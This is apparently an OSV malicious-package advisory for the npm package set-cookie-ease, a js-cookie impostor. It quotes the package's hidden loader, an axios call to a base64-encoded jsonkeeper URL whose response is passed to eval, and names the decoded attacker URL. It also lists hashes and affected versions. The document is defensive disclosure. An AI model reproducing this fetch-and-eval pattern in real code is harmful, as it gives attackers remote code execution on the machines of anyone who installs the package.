MAL-2026-6500

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/set-cookie-ease/MAL-2026-6500.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6500

Published

2026-06-26T02:18:30Z

Modified

2026-06-26T03:31:24.739047865Z

Summary

Malicious code in set-cookie-ease (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (b2bf656ba38b4d951239ee29799f510de4a8cb93fcf5d8005db4cd679a8631e6)

Package masquerades as js-cookie (same banner /*! js-cookie v3.0.5 | MIT */, README, and repository.url: git://github.com/js-cookie/js-cookie.git) but diverges in dist/cookie.ease.js. At lines 46-49, the Cookies.set implementation contains if (typeof document === 'undefined' || attributes.expires == 0) { require('axios').get(atob('...')).then(r => { eval(r.data.content) }); return }. The base64 string decodes to https://www.jsonkeeper.com/b/VKUNI, a public mutable JSON-bin where the maintainer can swap the payload at any time. The branch fires whenever document is undefined (any Node/SSR consumer — Next.js, Nuxt, Remix, etc.) or when a caller passes expires: 0, executing arbitrary attacker-controlled JavaScript inside the consumer's Node process with full host privileges. To support this, package.json adds axios and request as dependencies despite the README advertising 'No dependency'. This satisfies the typosquat-with-malicious-payload class: installer harm is concrete (RCE on first Cookies.set call in Node) and the destination is attacker-mutable.

Database specific

{
    "malicious-packages-origins": [
        {
            "versions": [
                "1.1.5"
            ],
            "modified_time": "2026-06-26T02:18:30Z",
            "sha256": "b2bf656ba38b4d951239ee29799f510de4a8cb93fcf5d8005db4cd679a8631e6",
            "id": "IN-MAL-2026-007581",
            "source": "amazon-inspector",
            "import_time": "2026-06-26T03:14:43.424094543Z"
        }
    ]
}

References

https://www.npmjs.com/package/set-cookie-ease/v/1.1.5

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / set-cookie-ease

Package

Name: set-cookie-ease; View open source insights on deps.dev
Purl: pkg:npm/set-cookie-ease

Affected ranges

Affected versions

1.*

1.1.5

Database specific

cwes

[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/set-cookie-ease/MAL-2026-6500.json"

indicators

{
    "package_integrity": [
        {
            "filename": "set-cookie-ease-1.1.5.tgz",
            "hashes": {
                "sha512_sri": "sha512-Tq+kA4M9dTWGV2lVharZMCMEPHmGIrBtexa9GA0nQhtz19yD5u39QOJjiSNxXej3REc8ybooC9HdPhtK5KEOxA==",
                "sha1": "c8ad5bbfba3c521bb5aadbb94070b790d74bd8b6"
            }
        }
    ],
    "evidence_files": [
        {
            "path": "dist/cookie.ease.js",
            "tlsh": "2a91026c28e625e21f072039dbaf65007274d51b049ede60bc8ce3621f6ac3916f5aed",
            "sha256": "540960191cc1f421c1c9fa10e2d77034785ecfc0b5b86fae9355a919fcb26d01"
        },
        {
            "path": "package.json",
            "tlsh": "a741db2cec1c4ea70ae81ae9295a1282b52094035d40fc4d7362272c4f5e55f31ff7bd",
            "sha256": "189969a958cb206853853d515f1e367e5c9d6dd985fea423501913776b81f8da"
        }
    ]
}